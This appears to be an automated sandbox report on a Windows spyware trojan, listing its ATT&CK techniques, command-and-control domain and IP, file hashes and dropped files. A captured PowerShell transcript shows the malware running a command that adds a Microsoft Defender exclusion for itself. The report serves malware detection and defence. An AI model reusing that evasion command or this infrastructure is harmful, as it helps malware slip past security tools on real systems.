Source: Yara match | File source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 3740, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 6412, type: MEMORYSTR

Mitre Att&ck Matrix

(Digits following a technique name are the report's per-technique signature hit counts, kept as extracted.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 112 | Masquerading 11 | OS Credential Dumping 2 | Query Registry 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 11 | Credentials in Registry 1 | Security Software Discovery 211 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 141 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 112 | NTDS | Virtualization/Sandbox Evasion 141 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 3 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 114 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

[screenshot: windows-stand]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | 14% | ReversingLabs | Win32.Trojan.Mardom

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

Domains

Source | Detection | Scanner | Label
insergejk.com | 0% | Virustotal |
mail.insergejk.com | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://insergejk.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://uEmkbr.com | 0% | Avira URL Cloud | safe
http://mail.insergejk.com | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://GfxT7Yj8XaSeYQqdvs.com | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.fontbureau.comoitud | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
insergejk.com | 64.202.184.79 | true | true | | unknown
mail.insergejk.com | unknown | unknown | true | | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.apache.org/licenses/LICENSE-2.0 | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://DynDns.comDynDNS | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://insergejk.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://uEmkbr.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://mail.insergejk.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
https://GfxT7Yj8XaSeYQqdvs.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938814213.0000000002F47000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000003.916484773.0000000000C34000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938715206.0000000002F10000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938861011.0000000002F57000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.como | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://www.fonts.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comoitud | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712594836.0000000002601000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
64.202.184.79 | insergejk.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                            General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483768
Start date: 15.09.2021
Start time: 13:18:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.19728 (renamed file extension from 19728 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/5@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 1.4% (good quality ratio 0.9%)
• Quality average: 42.7%
• Quality standard deviation: 35.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 37
• Number of non-executed functions: 4
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.82.210.154, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208
• Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
13:19:40 | API Interceptor | 660x Sleep call for process: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe modified
13:19:49 | API Interceptor | 41x Sleep call for process: powershell.exe modified

                                            Joe Sandbox View / Context

                                            IPs

Match | Associated Sample Name / URL | Detection
64.202.184.79 | Bill of Quantity & RFQ Specification Project form No Tender #100015520.exe | malicious
64.202.184.79 | Remittance Transaction advice receipt_2021 08 30 0000230145.exe | malicious
64.202.184.79 | Supplier order data sheet For June Delivery PO 4500101880.exe | malicious
64.202.184.79 | hkB5KuvPtB.exe | malicious
64.202.184.79 | bbva confirming Aviso de pago EUR5780020210104.exe | malicious
64.202.184.79 | bbva confirming Aviso de pago EUR5780020210104.exe | malicious
64.202.184.79 | bbva confirming Aviso de pago EUR5780020210104.exe | malicious
64.202.184.79 | DB payment transfer receipt E3S20092257312223020.exe | malicious
64.202.184.79 | DB payment transfer receipt E3S20092257310952020.exe | malicious
64.202.184.79 | Purchase Order & DWG data sheet Compliance form PO WH 5409.exe | malicious
64.202.184.79 | Oscar zGu5gCNIvVjLkVT.exe | malicious

                                                                  Domains

Match | Associated Sample Name / URL | Detection
No context

                                                                  ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
AS-26496-GO-DADDY-COM-LLCUS | bank in slip.exe | malicious | 107.180.56.180
AS-26496-GO-DADDY-COM-LLCUS | new order.exe | malicious | 107.180.56.180
AS-26496-GO-DADDY-COM-LLCUS | NNDQR-797.vbs | malicious | 107.180.72.43
AS-26496-GO-DADDY-COM-LLCUS | arrival notice.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | PO 56720012359.exe | malicious | 107.180.44.148
AS-26496-GO-DADDY-COM-LLCUS | re2.arm | malicious | 192.169.135.20
AS-26496-GO-DADDY-COM-LLCUS | XbvAoRKnFm.exe | malicious | 72.167.225.156
AS-26496-GO-DADDY-COM-LLCUS | STATEMENT OF ACCOUNT.exe | malicious | 184.168.102.151
AS-26496-GO-DADDY-COM-LLCUS | Wg1UpQ3DEC.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | PO.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | 2021091400983746_pdf.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | CLLKFIJI_(9-13-2021).xlsx.vbs | malicious | 148.72.215.196
AS-26496-GO-DADDY-COM-LLCUS | Kopie dokladu o transakci_14_09_2021.exe | malicious | 166.62.10.136
AS-26496-GO-DADDY-COM-LLCUS | G2aS9Rd9ys.exe | malicious | 148.66.136.188
AS-26496-GO-DADDY-COM-LLCUS | Terw9bPuiD.exe | malicious | 72.167.225.156
AS-26496-GO-DADDY-COM-LLCUS | UPDATED E-STATEMENT.exe | malicious | 184.168.102.151
AS-26496-GO-DADDY-COM-LLCUS | prueba23.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | prueba22.exe | malicious | 184.168.131.241
AS-26496-GO-DADDY-COM-LLCUS | fIlUUmpx1U.exe | malicious | 72.167.225.156
AS-26496-GO-DADDY-COM-LLCUS | QUOTATION.exe | malicious | 184.168.102.151

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.log
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 22284
Entropy (8bit): 5.597731348621349
Encrypted: false
SSDEEP: 384:DtCDuv2/jrFGE61gbX+RwSBKnSul62H7Y9gtrSJ3xCT1MabZlbAV7std0a5ZBDIr:Wq1g74KSulvTxcQCqfwgVQ
MD5: 87AC686A16C706FDE555F5DEB3EB065A
SHA1: C801FF51848E1D147A6D47432FEF9D4D84E29850
SHA-256: 8200EE45995E22C2226382D905BBE51139E9EAE12EBF2E5B49627856D4B554EE
SHA-512: 15DCDE66F4864006C645451166FF3BC231FAE5CC6755771778110A8FD772996CF7256B0D7B23C5B58AF0AC0FC25873BCB0EA50C369F3DF0D8D0A03AE3EDD6FC9
Malicious: false
Reputation: low
                                                                  Preview: @...e...........|.......h..._.R.O.........F..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvugezh2.wz1.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
                                                                  Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5qjmgej.qvv.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
                                                                  Preview: 1

C:\Users\user\Documents\20210915\PowerShell_transcript.116938.uyj91fg0.20210915131948.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 5885
Entropy (8bit): 5.379572321006364
Encrypted: false
SSDEEP: 96:BZRjSN0qDo1ZZZljSN0qDo1ZTaUijZbjSN0qDo1Z9GXyyhZG:2
MD5: 43816DD7D6137FD91A4291C66D58CC8F
SHA1: 51D0DA1420F630F6DD50E7AAF1A5702F64653108
SHA-256: FFE9D27BE807B5C2D72EAF10741DF16CF2E4461857293A5266CCABC304C8BCC8
SHA-512: 870C8681E4BE196743A78321300C468ABD6FFFCC6F9F8D2305A2E1187408E31422B6AFA1DC19C9004FC40E2A96F8B58588C780E7ED26AE4649CEC0033D590DDC
Malicious: false
                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915131949..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe..Process ID: 6444..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915131949..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe..**********************..Windows PowerShell transcript start..Start time: 20210915132412..Username: DESKTOP

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.388551225458123
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  File size:769536
                                                                  MD5:f116c183d3684fe8c6d8435aef94fd41
                                                                  SHA1:f92ea1cee647bbbae7ed522450428607f4ae3ee4
                                                                  SHA256:9664d7052873349992d586788296c16579941a802a41b70afdc08867b2153d65
                                                                  SHA512:be706f0f8a6b7330d7f2d5e00c9e143e64b2614f1110ddd875db1409f7d86dcf76c2c6cb01839dba6db054009b7ef7007320d185a7659c23606b120fc0408069
                                                                  SSDEEP:12288:G4EI/yzQs2TmITIL2yxSwi95Ldxgco5/RJhvmCp+w8UmyWHCM2K4CPBI:G4REITILbx3indxgco5/RJhuK+wrme3F
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.Aa..............0..N...n.......l... ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:f1f0f4d0eecccc71

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4b6c9e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x6141AD5E [Wed Sep 15 08:22:54 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                   add byte ptr [eax], al   (repeated 97 times: the bytes after the 6-byte jmp stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)

                                                                  Data Directories

                                                                   Name | Virtual Address | Virtual Size | Is in Section
                                                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
